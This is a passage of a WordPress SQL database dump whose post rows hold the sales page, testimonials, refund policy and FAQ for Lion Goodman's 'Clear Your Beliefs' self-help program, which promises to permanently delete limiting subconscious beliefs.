href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-03-17 21:06:22', '2015-03-18 02:06:22', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2152, 2, '2015-03-17 21:34:26', '2015-03-18 02:34:26', ' ', '', '', 'publish', 'open', 'open', '', '2152', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://clearyourbeliefs.com/?p=2152', 7, 'nav_menu_item', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2157, 2, '2015-04-14 15:37:18', '2015-04-14 20:37:18', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" 